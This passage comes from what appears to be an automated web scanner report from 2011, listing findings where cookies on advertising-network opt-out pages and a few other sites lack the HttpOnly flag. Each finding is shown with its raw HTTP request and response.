User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=717533784
Location: http://advertising.aol.com/token/0/3/717533784/
Content-Length: 0
Content-Type: text/html


6.8. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=688082620
Location: http://advertising.aol.com/token/8/1/688082620/
Content-Length: 0
Content-Type: text/html


6.9. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:52:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=87906609
Location: http://advertising.aol.com/token/2/2/87906609/
Content-Length: 0
Content-Type: text/html


6.10. http://optout.b3-uk.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.b3-uk.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.b3-uk.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: ATTABS=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Location: http://optout.ib.mookie1.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.11. http://optout.b3.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.b3.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTABS=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: ATTABS=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Location: http://optout.b3-uk.mookie1.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.12. http://optout.ib.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.ib.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.ib.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: ATTABS=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.13. http://optout.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout&nocache=4.743993E-02 HTTP/1.1
Host: optout.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optouts=cookies; RMOPTOUT=3; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:53:48 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; expires=Sat, 09-Nov-2024 18:53:49 GMT; path=/; domain=.mookie1.com
Set-Cookie: optouts=cookies; expires=Sat, 09-Nov-2024 18:53:49 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=3; expires=Sat, 09-Nov-2024 18:53:49 GMT; path=/; domain=.mookie1.com
Location: /optout/nai/index.php?action=optout&nocache=4.743993E-02&check_cookie=true
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



6.14. http://tag.admeld.com/nai-opt-out  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tag.admeld.com
Path:   /nai-opt-out

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai-opt-out?nocache=0.9152188 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560; meld_sess=4ec87822-8f33-4202-954a-f6f06a37734b

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: /nai-test-opt-out
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 13 Nov 2011 18:53:43 GMT
Connection: close
Set-Cookie: admeld_opt_out=true;expires=Sun, 01 Jan 2017 05:00:00 GMT;path=/;domain=tag.admeld.com;
Set-Cookie: meld_sess=delete;expires=Fri, 12 Sep 2008 09:07:03 GMT;path=/;domain=tag.admeld.com;
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/nai-test-opt-out">here</a>.</p>
</body></html>
...[SNIP]...

6.15. http://www.naiblog.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.naiblog.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.naiblog.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Nov 2011 18:55:33 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://naiblog.org/xmlrpc.php
Set-Cookie: PHPSESSID=74192b529967efecc52d85b1d2fc4e37; path=/
Location: http://naiblog.org/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


6.16. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 18:55:23 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/1.0.0e DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6falf9ou8puu4kncne5d3aqjo6; expires=Tue, 06-Dec-2011 22:28:43 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 13 Nov 2011 18:46:38 GMT
ETag: "3b79820f8d6a6383caa42e6c3b5a9ef1"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

6.17. http://api.aggregateknowledge.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout HTTP/1.1
Host: api.aggregateknowledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 11-Nov-2016 18:57:24 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 2694
Date: Sun, 13 Nov 2011 18:57:24 GMT
Connection: close


<html>
<head>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<title>Aggregate Knowledge</title>
<link href="/css/style_optout.css" rel="stylesheet" type="text/css">
<style>
#content_wrap, #content_le
...[SNIP]...

6.18. http://api.aggregateknowledge.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.aggregateknowledge.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&nocache=0.5774614 HTTP/1.1
Host: api.aggregateknowledge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.aggregateknowledge.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 11-Nov-2016 18:53:42 GMT; Path=/
Location: http://api.agkn.com/optout2?s=nai&dc=1
Content-Language: en-US
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:42 GMT
Connection: close


6.19. http://api.agkn.com/optout2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.agkn.com
Path:   /optout2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout2?s=nai&dc=1 HTTP/1.1
Host: api.agkn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: uuid=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Fri, 11-Nov-2016 18:53:43 GMT; Path=/
Location: http://api.aggregateknowledge.com/optout2?s=nai&q=validate
Content-Language: en-US
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:43 GMT
Connection: close


6.20. http://ats.tumri.net/ats/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/optout?nai=true&id=1936234986&nocache=0.7506367 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=15363377|-917800724

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Nov 13 18:53:44 UTC 2011
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Fri, 01-Dec-2079 22:07:51 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://ats.tumri.net:80/ats/optoutcheck?nai=true&id=1936234986&nocache=0.7506367&tu=1
Content-Length: 0
Date: Sun, 13 Nov 2011 18:53:44 GMT
Connection: close


6.21. https://console.turn.com/include/formAction.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://console.turn.com
Path:   /include/formAction.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /include/formAction.htm HTTP/1.1
Host: console.turn.com
Connection: keep-alive
Content-Length: 91
Cache-Control: max-age=0
Origin: https://console.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://console.turn.com/login/forgotPassword.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; SIFR-PREFETCHED=true

actionControler=ForgotPassword&GUID=3333672997611656568&emailAddress=weedw&btnSubmit=Submit

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: guid=3333672997611656568%3A%2Flogin%2FforgotPassword.htm%7Cfalse3333672997611656568%3A%2Flogin%2FforgotPassword.htm%7Cfalse; Domain=.turn.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 18:52:44 GMT
Content-Length: 4218


                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Co
...[SNIP]...

6.22. http://developer.yahoo.net/yui/license.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developer.yahoo.net
Path:   /yui/license.txt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/license.txt HTTP/1.1
Host: developer.yahoo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:57:31 GMT
Set-Cookie: BX=00t849h7c04or&b=3&s=bd; expires=Tue, 13-Nov-2013 20:00:00 GMT; path=/; domain=.yahoo.net
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3311

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

6.23. http://domdex.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /nai_optout.php

